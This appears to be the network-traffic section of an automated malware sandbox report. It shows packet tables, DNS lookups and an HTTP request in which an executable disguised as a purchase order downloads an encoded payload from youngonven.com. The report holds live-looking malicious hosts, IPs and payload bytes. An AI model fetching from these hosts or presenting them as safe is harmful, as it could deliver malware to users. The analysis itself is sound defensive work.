Oct 8, 2024 11:32:33.249339104 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249349117 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249360085 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249372005 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249377966 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249403000 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249414921 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249429941 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249439955 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249449968 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249459982 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249470949 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249480009 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249490976 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249494076 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249525070 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249869108 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249880075 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249890089 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249905109 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249913931 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249916077 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249924898 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249927998 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249933004 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249939919 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249952078 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249959946 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249983072 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.250000000 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.250307083 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250329971 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250341892 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250355005 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250415087 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250428915 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250447035 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.250458002 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.292850018 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.292865992 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.292875051 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.292884111 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.292895079 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.292907000 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.292963982 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.293004036 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.293014050 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.293024063 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.293051958 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.341315985 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350370884 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350455999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350481033 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350496054 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350501060 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350511074 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350532055 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350542068 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350575924 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350600004 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350601912 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350614071 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350629091 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350637913 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350642920 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350658894 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350666046 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350672960 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350687027 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350699902 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350708961 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350712061 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350734949 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350749969 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350763083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350763083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350770950 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350781918 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350785017 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350797892 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350811005 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350825071 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350831032 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350838900 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350855112 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350860119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350874901 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350887060 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350888968 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350913048 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350912094 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350928068 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350941896 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350955963 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350979090 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.350980043 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.350995064 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351011992 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351026058 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351033926 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351039886 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351057053 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351062059 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351072073 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351080894 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351085901 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351099968 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351114035 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351119995 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351128101 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351141930 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351144075 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351155043 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351166010 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351170063 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351182938 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351192951 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351197004 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351213932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351221085 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351227999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351248980 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351249933 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351273060 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351289034 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351303101 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351320028 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351326942 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351362944 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351411104 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351424932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351438046 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351475000 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351536989 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351552010 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351567030 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351579905 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351583004 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351607084 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351615906 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351638079 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351651907 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351656914 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351665974 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351681948 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351695061 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351697922 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351711988 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351722956 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351732016 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351746082 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351758957 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351763010 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351778984 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351787090 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351792097 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351810932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351824999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351828098 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351840019 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351846933 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351855993 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351871014 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351878881 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351888895 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351905107 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351922035 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351939917 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351958990 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351965904 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.351974010 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351989031 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.351995945 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352014065 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352377892 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352404118 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352417946 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352431059 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352444887 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352461100 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352478981 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352556944 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352579117 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352581024 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352593899 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352605104 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352607012 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352621078 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352632999 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352642059 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352655888 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352662086 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352669954 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352685928 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352705002 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.352706909 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.352729082 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.383598089 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.383620024 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.383634090 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.383769035 CEST	50007	80	192.168.2.6	63.250.38.167

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 11:30:04.422023058 CEST	61150	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:30:04.571790934 CEST	53	61150	1.1.1.1	192.168.2.6
Oct 8, 2024 11:30:44.310996056 CEST	50631	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:30:44.411431074 CEST	53	50631	1.1.1.1	192.168.2.6
Oct 8, 2024 11:31:04.654422998 CEST	62609	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:31:04.918325901 CEST	53	62609	1.1.1.1	192.168.2.6
Oct 8, 2024 11:31:25.060502052 CEST	65370	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:31:25.188194990 CEST	53	65370	1.1.1.1	192.168.2.6
Oct 8, 2024 11:31:45.471122026 CEST	64886	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:31:45.522833109 CEST	53	64886	1.1.1.1	192.168.2.6
Oct 8, 2024 11:32:06.193291903 CEST	57596	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:32:06.314630032 CEST	53	57596	1.1.1.1	192.168.2.6
Oct 8, 2024 11:32:28.266700029 CEST	63968	53	192.168.2.6	1.1.1.1
Oct 8, 2024 11:32:28.640686035 CEST	53	63968	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 11:30:04.422023058 CEST	192.168.2.6	1.1.1.1	0xd674	Standard query (0)	youngonven.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.310996056 CEST	192.168.2.6	1.1.1.1	0xe6e7	Standard query (0)	www.emeraldsurrogatefabric.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:04.654422998 CEST	192.168.2.6	1.1.1.1	0xa3e1	Standard query (0)	www.pure1027.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:25.060502052 CEST	192.168.2.6	1.1.1.1	0x2b7f	Standard query (0)	www.thecolourgrey.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:45.471122026 CEST	192.168.2.6	1.1.1.1	0x18eb	Standard query (0)	www.anangtoto.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:32:06.193291903 CEST	192.168.2.6	1.1.1.1	0xcb12	Standard query (0)	www.0757hunyin.net	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:32:28.266700029 CEST	192.168.2.6	1.1.1.1	0x4a72	Standard query (0)	www.texanboxes.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 11:30:04.571790934 CEST	1.1.1.1	192.168.2.6	0xd674	No error (0)	youngonven.com		63.250.38.167	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		192.243.59.20	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		172.240.108.68	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		192.243.59.12	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		192.243.61.227	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		192.243.59.13	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		172.240.108.84	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		172.240.108.76	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		192.243.61.225	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		172.240.127.234	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:30:44.411431074 CEST	1.1.1.1	192.168.2.6	0xe6e7	No error (0)	www.emeraldsurrogatefabric.com		172.240.253.132	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:04.918325901 CEST	1.1.1.1	192.168.2.6	0xa3e1	No error (0)	www.pure1027.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 11:31:04.918325901 CEST	1.1.1.1	192.168.2.6	0xa3e1	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 11:31:04.918325901 CEST	1.1.1.1	192.168.2.6	0xa3e1	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:04.918325901 CEST	1.1.1.1	192.168.2.6	0xa3e1	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:25.188194990 CEST	1.1.1.1	192.168.2.6	0x2b7f	No error (0)	www.thecolourgrey.com		104.21.93.17	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:25.188194990 CEST	1.1.1.1	192.168.2.6	0x2b7f	No error (0)	www.thecolourgrey.com		172.67.202.180	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:31:45.522833109 CEST	1.1.1.1	192.168.2.6	0x18eb	No error (0)	www.anangtoto.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 11:31:45.522833109 CEST	1.1.1.1	192.168.2.6	0x18eb	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:32:06.314630032 CEST	1.1.1.1	192.168.2.6	0xcb12	Name error (3)	www.0757hunyin.net	none	none	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:32:28.640686035 CEST	1.1.1.1	192.168.2.6	0x4a72	No error (0)	www.texanboxes.com	texanboxes.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 11:32:28.640686035 CEST	1.1.1.1	192.168.2.6	0x4a72	No error (0)	texanboxes.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 8, 2024 11:32:28.640686035 CEST	1.1.1.1	192.168.2.6	0x4a72	No error (0)	texanboxes.com		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

youngonven.com

www.emeraldsurrogatefabric.com

www.pure1027.com

www.thecolourgrey.com

www.anangtoto.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	63.250.38.167	80	3472	C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:04.582835913 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:05.225514889 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:05 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:05.225565910 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:30:05.225600958 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:30:05.225635052 CEST	672	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
